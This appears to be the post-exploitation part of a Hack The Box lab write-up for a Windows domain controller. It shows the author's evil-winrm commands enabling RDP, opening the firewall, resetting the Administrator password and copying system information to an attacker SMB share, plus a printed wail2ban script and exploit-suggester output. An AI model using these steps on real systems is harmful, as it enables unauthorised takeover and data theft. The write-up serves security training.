Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
*evil-winrm* ps c:\Users\Administrator\Documents> cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /
v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
*evil-winrm* ps c:\Users\Administrator\Documents> cmd /c netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
*evil-winrm* ps c:\Users\Administrator\Documents> NET USER Administrator Qwer1234
The command completed successfully.Enabling RDP & Password reset for the administrator user
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ xfreerdp /u:administrator /p:Qwer1234 /v:apt.htb.local /cert:ignore /dynamic-resolution /tls-seclevel:0
[22:18:19:511] [2645922:2645923] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[22:18:19:511] [2645922:2645923] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:18:19:560] [2645922:2645923] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:18:19:561] [2645922:2645923] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:18:19:561] [2645922:2645923] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
[22:18:19:238] [2645922:2645923] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]Starting an RDP session
unfortunately, the target system is a server core
Exiting the RPD session…
Scheduled Tasks
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
TaskName TaskPath State
-------- -------- -----
unblock \ Ready
wail2ban \ Readyunblock
*evil-winrm* ps c:\Users\Administrator\Documents> cmd /c schtasks /QUERY /TN \unblock /V /FO LIST
folder: \
hostname: APT
taskname: \unblock
next run time: 10/23/2023 9:30:00 PM
status: Ready
logon mode: Interactive/Background
last run time: 10/23/2023 9:15:00 PM
last result: 0
author: N/A
task to run: Powershell.exe -file C:\scripts\wail2ban\removebans.ps1
start in: N/A
comment: N/A
scheduled task state: Enabled
idle time: Disabled
power management: Stop On Battery Mode, No Start On Batteries
run as user: SYSTEM
delete task if not rescheduled: Disabled
stop task if runs x hours and x mins: 72:00:00
schedule: Scheduling data is not available in this format.
schedule type: One Time Only, Minute
start time: 12:00:00 AM
start date: 9/24/2020
end date: N/A
days: N/A
months: N/A
repeat: Every: 0 Hour(s), 15 Minute(s)
repeat: Until: Time: None
repeat: Until: Duration: Disabled
repeat: Stop If Still Running: Disabledevery 15 minutes: C:\scripts\wail2ban\removebans.ps1
c:\scripts\wail2ban\removebans.ps1
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat C:\scripts\wail2ban\removebans.ps1
cd C:\scripts\wail2ban\
.\wail2ban.ps1 -jail
.\wail2ban.ps1 -jailbreakC:\scripts\wail2ban\wail2ban.ps1
C:\scripts\wail2ban\wail2ban.ps1
*evil-winrm* ps c:\Users\Administrator\Documents> cat C:\scripts\wail2ban\wail2ban.ps1
################################################################################
# _ _ ____ _
# __ ____ _(_) |___ \| |__ __ _ _ __
# \ \ /\ / / _` | | | __) | '_ \ / _` | '_ \
# \ V V / (_| | | |/ __/| |_) | (_| | | | |
# \_/\_/ \__,_|_|_|_____|_.__/ \__,_|_| |_|
#
################################################################################
#
# For help, read the below function.
#
function help {
"`nwail2ban `n"
"wail2ban is an attempt to recreate fail2ban for windows, hence [w]indows f[ail2ban]."
" "
"wail2ban takes configured events known to be audit failures, or similar, checks for "+`
"IPs in the event message, and given sufficient failures, bans them for a small amount"+`
"of time."
" "
"settings: "
" -config : show the settings that are being used "
" -jail : show the currently banned IPs"
" -jailbreak : bust out all the currently banned IPs"
" -help : This message."
" "
}
$DebugPreference = "continue"
################################################################################
# Constants
$check_window = 120 # we check the most recent x seconds of log. default: 120
$check_count = 5 # ban after this many failures in search period. default: 5
$MAX_BANDURATION = 7776000 # 3 Months in seconds
################################################################################
# Files
$wail2banInstall = ""+(Get-Location)+"\"
$wail2banScript = $wail2banInstall+"wail2ban.ps1"
$logFile = $wail2banInstall+"wail2ban_log.log"
$ConfigFile = $wail2banInstall+"wail2ban_config.ini"
$BannedIPLog = $wail2banInstall+"bannedIPLog.ini"
################################################################################
# Constructs
$RecordEventLog = "Application" # Where we store our own event messages
$firewallruleprefix = "wail2ban block:" # What we name our Rules
$EventTypes = "Application,Security,System" #Event logs we allow to be processed
new-variable -name regexip -force -value ([regex]'(?:^|(?<=\s))(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))(?=\s|$)')
# Ban Count structure
$BannedIPs = @{}
# Incoming event structure
$CheckEvents = New-object system.data.datatable("CheckEvents")
$null = $CheckEvents.columns.add("EventLog")
$null = $CheckEvents.columns.add("EventID")
$null = $CheckEvents.columns.add("EventDescription")
$WhiteList = @()
#$host.UI.RawUI.BufferSize = new-object System.Management.Automation.Host.Size(100,50)
#You can overload the BlockType here for 2003, if you feel like having fun.
$OSVersion = invoke-expression "wmic os get Caption /value"
if ($OSVersion -match "2008") { $BLOCK_TYPE = "NETSH" }
if ($OSVersion -match "2012") { $BLOCK_TYPE = "NETSH" }
if ($OSVersion -match "2016") { $BLOCK_TYPE = "NETSH" }
#Grep configuration file
switch -regex -file $ConfigFile {
"^\[(.+)\]$" {
$Header = $matches[1].Trim()
}
"^\s*([^#].+?)\s*=\s*(.*)" {
$Match1 = $matches[1]
$Match2 = $matches[2]
if ( $EventTypes -match $Header ) {
$row = $CheckEvents.NewRow()
$row.EventLog = $Header
$row.EventID = $Match1
$row.EventDescription = $Match2
$CheckEvents.Rows.Add($row)
} else {
switch ($Header) {
"Whitelist" { $WhiteList += $Match1; }
}
}
}
}
#We also want to whitelist this machine's IPAddress.
$SelfList = (Get-NetIPAddress).IPAddress
################################################################################
# Functions
function event ($text,$task,$result) {
$event = new-object System.Diagnostics.EventLog($RecordEventLog)
$event.Source="wail2ban"
switch ($task) {
"ADD" { $logeventID = 1000 }
"REMOVE" { $logeventID = 2000 }
}
switch ($result) {
"fail" { $eventtype = [system.diagnostics.eventlogentrytype]::Error; $logeventID += 1 }
default { $eventtype = [system.diagnostics.eventlogentrytype]::Information}
}
$event.WriteEntry($text,$eventType,$logeventID)
}
#Log type functions
function error ($text) { log "E" $text }
function warning ($text) { log "W" $text }
function debug ($text) { log "D" $text }
function actioned ($text) { log "A" $text }
#Log things to file and debug
function log ($type, $text) {
$output = ""+(get-date -format u).replace("Z","")+" $tag $text"
if ($type -eq "A") { $output | out-file $logfile -append}
switch ($type) {
"D" { write-debug $output}
"w" { write-warning "warning: $output"}
"e" { write-error "error: $output"}
"A" { write-debug $output }
}
}
#Get the current list of wail2ban bans
function get_jail_list {
$fw = New-Object -ComObject hnetcfg.fwpolicy2
return $fw.rules | Where-Object { $_.name -match $FirewallRulePrefix } | Select name, description
}
# Confirm if rule exists.
function rule_exists ($IP) {
switch($BLOCK_TYPE) {
"NETSH" { $Rule = "netsh advfirewall firewall show rule name=`"$FirewallRulePrefix $IP`""}
default { error "Don't have a known Block Type. $BLOCK_TYPE" }
}
if ($rule) {
$result = invoke-expression $rule
if ($result -match "----------") {
return "Yes"
} else {
return "No"
}
}
}
#Convert subnet Slash (e.g. 26, for /26) to netmask (e.g. 255.255.255.192)
function netmask($MaskLength) {
$ipaddress = [uint32]([convert]::ToUInt32($(("1" * $MaskLength).PadRight(32, "0")), 2))
$DottedIP = $( For ($i = 3; $i -gt -1; $i--) {
$remainder = $ipaddress % [math]::Pow(256, $i)
($ipaddress - $remainder) / [math]::Pow(256, $i)
$IPAddress = $Remainder
} )
return [string]::Join('.', $DottedIP)
}
#check if IP is whitelisted
function whitelisted($IP) {
foreach ($white in $Whitelist) {
if ($IP -eq $white) { $Whitelisted = "Uniquely listed."; break}
if ($white.contains("/")) {
$Mask = netmask($white.Split("/")[1])
$subnet = $white.Split("/")[0]
if ((([net.ipaddress]$IP).Address -Band ([net.ipaddress]$Mask).Address ) -eq`
(([net.ipaddress]$subnet).Address -Band ([net.ipaddress]$Mask).Address )) {
$Whitelisted = "Contained in subnet $white"; break;
}
}
}
return $Whitelisted
}
#Read in the saved file of settings. Only called on script start, such as after reboot
function pickupBanDuration {
if (Test-Path $BannedIPLog) {
get-content $BannedIPLog | %{
if (!$BannedIPs.ContainsKey($_.split(" ")[0])) { $BannedIPs.Add($_.split(" ")[0],$_.split(" ")[1]) }
}
debug "$BannedIPLog ban counts loaded"
} else { debug "No IPs to collect from BannedIPLog" }
}
#Get the ban time for an IP, in seconds
function getBanDuration ($IP) {
if ($BannedIPs.ContainsKey($IP)) {
[int]$Setting = $BannedIPs.Get_Item($IP)
} else {
$Setting = 0
$BannedIPs.Add($IP,$Setting)
}
$Setting++
$BannedIPs.Set_Item($IP,$Setting)
$banduration = [math]::min([math]::pow(5,$Setting)*60, $MAX_BANDURATION)
debug "IP $IP has the new setting of $setting, being $BanDuration seconds"
if (Test-Path $BannedIPLog) { clear-content $BannedIPLog } else { New-Item $BannedIPLog -type file }
$BannedIPs.keys | %{ "$_ "+$BannedIPs.Get_Item($_) | Out-File $BannedIPLog -Append }
return $BanDuration
}
# Ban the IP (with checking)
function jail_lockup ($IP, $ExpireDate) {
$result = whitelisted($IP)
if ($result) { warning "$IP is whitelisted, except from banning. Why? $result " }
else {
if (!$ExpireDate) {
$BanDuration = getBanDuration($IP)
$ExpireDate = (Get-Date).AddSeconds($BanDuration)
}
if ((rule_exists $IP) -eq "Yes") { warning ("IP $IP already blocked.")
} else {
firewall_add $IP $ExpireDate
}
}
}
# Unban the IP (with checking)
function jail_release ($IP) {
if ((rule_exists $IP) -eq "No") { debug "$IP firewall listing doesn't exist. Can't remove it. "
} else {
firewall_remove $IP
}
}
# Add the Firewall Rule
function firewall_add ($IP, $ExpireDate) {
$Expire = (get-date $ExpireDate -format u).replace("Z","")
switch($BLOCK_TYPE) {
"netsh" { $rule = "netsh advfirewall firewall add rule name=`"$firewallruleprefix $ip`" dir=in protocol=any action=block remoteip=$ip description=`"expire: $Expire`"" }
default { error "Don't have a known Block Type. $BLOCK_TYPE" }
}
if ($rule) {
$result = invoke-expression $rule
if ($LASTEXITCODE -eq 0) {
$banmsg = "action successful: Firewall rule added for $IP, expiring on $ExpireDate"
actioned "$BanMsg"
event "$BanMsg" ADD OK
} else {
$message = "action failure: could not add firewall rule for $IP, error: `"$result`". Return code: $LASTEXITCODE"
error $Message
event $Message ADD FAIL
}
}
}
# Remore the Filewall Rule
function firewall_remove ($IP) {
switch($BLOCK_TYPE) {
"NETSH" { $Rule = "netsh advfirewall firewall delete rule name=`"$FirewallRulePrefix $IP`""}
default { error "Don't have a known Block Type. $BLOCK_TYPE" }
}
if ($rule) {
$result = invoke-expression $rule
if ($LASTEXITCODE -eq 0) {
actioned "action successful: Firewall ban for $IP removed"
event "Removed IP $IP from firewall rules" REMOVE OK
} else {
$message = "action failure: could not remove firewall rule for $IP, error: `"$result`". Return code: $LASTEXITCODE"
error $Message
event $Message REMOVE FAIL
}
}
}
#Remove any expired bans
function unban_old_records {
$jail = get_jail_list
if ($jail) {
foreach ($inmate in $jail) {
$IP = $inmate.Name.substring($FirewallRulePrefix.length+1)
$releasedate = $inmate.description.substring("expire: ".Length)
if ($([int]([datetime]$ReleaseDate- (Get-Date)).TotalSeconds) -lt 0) {
debug "unban old records: $IP looks old enough $(get-date $ReleaseDate -format G)"
jail_release $IP
}
}
}
}
#Convert the TimeGenerated time into Epoch
function WMIDateStringToDateTime( [String] $iSt ) {
$iSt.Trim() > $null
$iyear = [int32]::Parse($iSt.SubString( 0, 4))
$imonth = [int32]::Parse($iSt.SubString( 4, 2))
$iday = [int32]::Parse($iSt.SubString( 6, 2))
$ihour = [int32]::Parse($iSt.SubString( 8, 2))
$iminute = [int32]::Parse($iSt.SubString(10, 2))
$isecond = [int32]::Parse($iSt.SubString(12, 2))
$iMilliseconds = 0
$iutcoffsetminutes = [int32]::Parse($iSt.Substring(21, 4))
if ( $iutcoffsetminutes -ne 0 ) { $dtkind = [datetimekind]::Local }
else { $dtkind = [datetimekind]::Utc }
$ReturnDate = New-Object -TypeName DateTime -ArgumentList $iYear, $iMonth, $iDay, $iHour, $iMinute, $iSecond, $iMilliseconds, $dtkind
return (get-date $ReturnDate -UFormat "%s")
}
# Remove recorded access attempts, by IP, or expired records if no IP provided.
function clear_attempts ($IP = 0) {
$Removes = @()
foreach ($a in $Entry.GetEnumerator()) {
if ($IP -eq 0) {
if ([int]$a.Value[1]+$CHECK_WINDOW -lt (get-date ((get-date).ToUniversalTime()) -UFormat "%s").replace(",",".")) { $Removes += $a.Key }
} else {
foreach ($a in $Entry.GetEnumerator()) { if ($a.Value[0] -eq $IP) { $Removes += $a.Key } }
}
}
foreach ($b in $Removes) { $Entry.Remove($b)}
}
################################################################################
#Process input parameters
if ($setting) { debug "wail2ban started. $setting" }
#Display current configuration.
if ($args -match "-config") {
write-host "`nwail2ban is currently configured to: `n ban IPs for " -nonewline
for ($i = 1; $i -lt 5; $i++) { write-host (""+[math]::pow(5,$i)+", ") -foregroundcolor "cyan" -nonewline }
write-host "... $($MAX_BANDURATION/60) " -foregroundcolor "cyan" -nonewline
write-host " minutes, `n if more than " -nonewline
write-host $CHECK_COUNT -foregroundcolor "cyan" -nonewline
write-host " failed attempts are found in a " -nonewline
write-host $CHECK_WINDOW -foregroundcolor "cyan" -nonewline
write-host " second window. `nThis process will loop every time a new record appears. "
write-host "`nit's currently checking:"
foreach ($event in $CheckEvents ) { "- "+$Event.EventLog+" event log for event ID "+$Event.EventDescription+" (Event "+$Event.EventID+")"}
write-host "`nand we're whitelisting: "
foreach ($white in $whitelist) {
write-host "- $($white)" -foregroundcolor "cyan" -nonewline
}
write-host "in addition to any IPs present on the network interfaces on the machine"
exit
}
# Release all current banned IPs
if ($args -match "-jailbreak") {
actioned "Jailbreak initiated by console. Removing ALL IPs currently banned"
$EnrichmentCentre = get_jail_list
if ($EnrichmentCentre){
"`nAre you trying to escape? [chuckle]"
"Things have changed since the last time you left the building."
"What's going on out there will make you wish you were back in here."
" "
foreach ($subject in $EnrichmentCentre) {
$IP = $subject.name.substring($FirewallRulePrefix.length+1)
firewall_remove $IP
}
clear-content $BannedIPLog
} else { "`nYou can't escape, you know. `n`n(No current firewall listings to remove.)" }
exit
}
# Show the inmates in the jail.
if ($args -match "-jail") {
$inmates = get_jail_list
if ($inmates) {
"wail2ban currently banned listings: `n"
foreach ($a in $inmates) {
$IP = $a.name.substring($FirewallRulePrefix.length+1)
$expire = $a.description.substring("expire: ".length)
""+$IP.PadLeft(14)+" expires at $Expire"
}
"`nThis is a listing of the current Windows Firewall with Advanced Security rules, starting with `""+$FirewallRulePrefix+" *`""
} else { "There are no currrently banned IPs"}
exit
}
#Unban specific IP. Remove associated schtask, if exists.
if ($args -match "-unban") {
$ip = $args[ [array]::indexOf($args,"-unban")+1]
actioned "unban ip invoked: going to unban $IP and remove from the log."
jail_release $IP
(get-content $BannedIPLog) | ? {$_ -notmatch $IP } | set-content $BannedIPLog # remove IP from ban log
exit
}
#Display Help Message
if ($args -match "-help") {
help; exit
}
################################################################################
#Setup for the loop
$SinkName = "LoginAttempt"
$Entry = @{}
$eventlist ="("
foreach($a in $CheckEvents) {
$eventlist+="(TargetInstance.EventCode=$($a.EventID) and TargetInstance.LogFile='$($a.EventLog)') OR "
}
$eventlist = $eventlist.substring(0,$eventlist.length-4)+")"
$query = "SELECT * FROM __instanceCreationEvent WHERE TargetInstance ISA 'Win32_NTLogEvent' AND $eventlist"
actioned "wail2ban invoked"
actioned "checking for a heap of events: "
$CheckEvents | %{ actioned " - $($_.EventLog) log event code $($_.EventID)" }
actioned "the whitelist: $whitelist"
actioned "the self-list: $Selflist"
pickupBanDuration
################################################################################
#Loop!
Register-WMIEvent -Query $query -sourceidentifier $SinkName
do { #bedobedo
$new_event = wait-event -sourceidentifier $SinkName
$TheEvent = $new_event.SourceeventArgs.NewEvent.TargetInstance
select-string $RegexIP -input $TheEvent.message -AllMatches | foreach { foreach ($a in $_.matches) {
$IP = $a.Value
if ($SelfList -match $IP) { debug "Whitelist of self-listed IPs! Do nothing. ($IP)" }
else {
$RecordID = $TheEvent.RecordNumber
$EventDate = WMIDateStringToDateTime($TheEvent.TIMEGenerated)
$Entry.Add($RecordID, @($IP,$EventDate))
$IPCount = 0
foreach ($a in $Entry.Values) { if ($IP -eq $a[0]) { $IPCount++} }
debug "$($theevent.logfile) log event captured: ID $($RecordID), IP $IP, Event Code $($TheEvent.EventCode), Attempt #$($IPCount). "
if ($IPCount -ge $CHECK_COUNT) {
jail_lockup $IP
clear_attempts $IP
}
clear_attempts
unban_old_records
}
}
}
Remove-event -sourceidentifier $SinkName
} while ($true)its the wail2ban PS script
wail2ban
*Evil-WinRM* PS C:\Users\Administrator\Documents> cmd /c schtasks /QUERY /TN \wail2ban /V /FO LIST
Folder: \
HostName: APT
TaskName: \wail2ban
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 10/23/2023 12:11:59 PM
Last Result: 0
Author: glasnt
Task To Run: C:\scripts\wail2ban\start_wail2ban.bat
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AOn system start: C:\scripts\wail2ban\start_wail2ban.bat
C:\scripts\wail2ban\start_wail2ban.bat
*evil-winrm* ps c:\Users\Administrator\Documents> cat C:\scripts\wail2ban\start_wail2ban.bat
cd c:\scripts\wail2ban\
timeout 120
start powershell .\wail2ban.ps1c:\scripts\
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls C:\scripts\
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 11:05 AM wail2ban
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls C:\scripts\wail2ban
Directory: C:\scripts\wail2ban
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/22/2020 10:15 PM 0 bannedIPLog.ini
-a---- 12/16/2017 12:58 PM 1517 LICENCE.md
-a---- 12/16/2017 12:58 PM 5530 README.md
-a---- 9/24/2020 8:24 AM 72 removebans.ps1
-a---- 12/16/2017 12:58 PM 1383 start wail2ban onstartup.xml
-a---- 10/22/2020 5:53 PM 71 start_wail2ban.bat
-a---- 9/24/2020 11:05 AM 16233 wail2ban.ps1
-a---- 12/16/2017 12:58 PM 285 wail2ban_config.ini
-a---- 12/16/2017 12:58 PM 2608 wail2ban_htmlgen.ps1
-a---- 10/23/2023 9:15 PM 76812 wail2ban_log.logsysteminfo
*evil-winrm* ps c:\> systeminfo
host name: APT
os name: Microsoft Windows Server 2016 Standard
os version: 10.0.14393 N/A Build 14393
os manufacturer: Microsoft Corporation
os configuration: Primary Domain Controller
os build type: Multiprocessor Free
registered owner: Administrator
registered organization: Managed by Terraform
product id: 00376-30821-30176-AA213
original install date: 9/24/2020, 7:54:17 AM
system boot time: 10/23/2023, 12:11:47 PM
system manufacturer: VMware, Inc.
system model: VMware Virtual Platform
system type: x64-based PC
processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
bios version: Phoenix Technologies LTD 6.00, 12/12/2018
windows directory: C:\Windows
system directory: C:\Windows\system32
boot device: \Device\HarddiskVolume1
system locale: en-us;English (United States)
input locale: en-us;English (United States)
time zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
total physical memory: 4,095 MB
available physical memory: 2,867 MB
virtual memory: Max Size: 4,799 MB
virtual memory: Available: 3,485 MB
virtual memory: In Use: 1,314 MB
page file location(s): C:\pagefile.sys
domain: htb.local
logon server: \\APT
hotfix(s): 4 Hotfix(s) Installed.
[01]: KB3199986
[02]: KB4565912
[03]: KB4576750
[04]: KB5000803
network card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
connection name: Ethernet
dhcp enabled: No
IP address(es)
[01]: 10.10.10.213
[02]: fe80::44d8:93c7:dd88:c522
[03]: dead:beef::b885:d62a:d679:573f
[04]: dead:beef::44d8:93c7:dd88:c522
[05]: dead:beef::240
hyper-v requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.4 Hotfixes
[01]: KB3199986[02]: KB4565912[03]: KB4576750[04]: KB5000803
Vulnerabilities
*Evil-WinRM* PS C:\> systeminfo > sysinfo.txt
*Evil-WinRM* PS C:\> copy .\sysinfo.txt \\10.10.16.8\smb\┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ wes --update ; wes sysinfo.txt -c -p KB3199986 KB4565912 KB4576750 KB5000803 --exploits-only --hide "Internet Explorer" Edge Flash -s critical
Windows Exploit Suggester 1.02 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20231021
Windows Exploit Suggester 1.02 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2016
- Generation: 2016
- Build: 14393
- Version: 1607
- Architecture: x64-based
- Installed hotfixes (4): KB3199986, KB4565912, KB4576750, KB5000803
- Manually specified hotfixes (4): KB4576750, KB5000803, KB4565912, KB3199986
[+] Loading definitions
- Creation date of definitions: 20231021
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20161108
CVE: CVE-2016-7241
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/40875/, http://packetstormsecurity.com/files/139991/Microsoft-Edge-JSON.parse-Information-Leak.html
Date: 20161108
CVE: CVE-2016-7200
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/40990/, https://www.exploit-db.com/exploits/40785/
Date: 20161108
CVE: CVE-2016-7240
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploit: https://www.exploit-db.com/exploits/40773/
Date: 20161108
CVE: CVE-2016-7201
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/40990/, https://www.exploit-db.com/exploits/40784/
Date: 20170314
CVE: CVE-2017-0143
KB: KB4016635
Title: Windows SMB Remote Code Execution Vulnerability
Affected product: Windows Server 2016
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/41891/, https://www.exploit-db.com/exploits/41987/, https://www.exploit-db.com/exploits/43970/
Date: 20170613
CVE: CVE-2017-0143
KB: KB4022723
Title: Windows SMB Remote Code Execution Vulnerability
Affected product: Windows Server 2016
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/41891/, https://www.exploit-db.com/exploits/41987/, https://www.exploit-db.com/exploits/43970/
Date: 20161108
CVE: CVE-2016-7202
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploits: https://www.exploit-db.com/exploits/40793/, https://www.exploit-db.com/exploits/40786/
Date: 20200512
CVE: CVE-2020-0646
KB: KB4532933
Title: .NET Framework Remote Code Execution Injection Vulnerability
Affected product: Microsoft .NET Framework 4.8 on Windows Server 2016
Affected component: .NET Framework
Severity: Critical
Impact: Remote Code Execution
Exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
Date: 20161108
CVE: CVE-2016-7203
KB: KB3200970
Title: Cumulative Security Update for Microsoft Edge
Affected product: Windows Server 2016
Affected component: Microsoft Edge
Severity: Critical
Impact: Remote Code Execution
Exploit: https://www.exploit-db.com/exploits/40787/
[-] Missing patches: 4
- KB3200970: patches 6 vulnerabilities
- KB4016635: patches 1 vulnerability
- KB4022723: patches 1 vulnerability
- KB4532933: patches 1 vulnerability
[I] KB with the most recent release date
- ID: KB4532933
- Release date: 20200512
[+] Done. Displaying 9 of the 570 vulnerabilities found.Web
*evil-winrm* ps c:\inetpub\wwwroot> ls
directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 8:31 AM css
d----- 9/24/2020 8:31 AM fonts
d----- 9/24/2020 8:31 AM images
d----- 9/24/2020 8:31 AM js
-a---- 12/23/2019 11:30 AM 9386 about.html
-a---- 12/23/2019 11:30 AM 12146 clients.html
-a---- 12/23/2019 11:29 AM 14879 index.html
-a---- 9/24/2020 9:28 AM 5528 news.html
-a---- 12/23/2019 11:30 AM 10592 services.html
-a---- 12/23/2019 11:30 AM 6326 support.htmljust static pages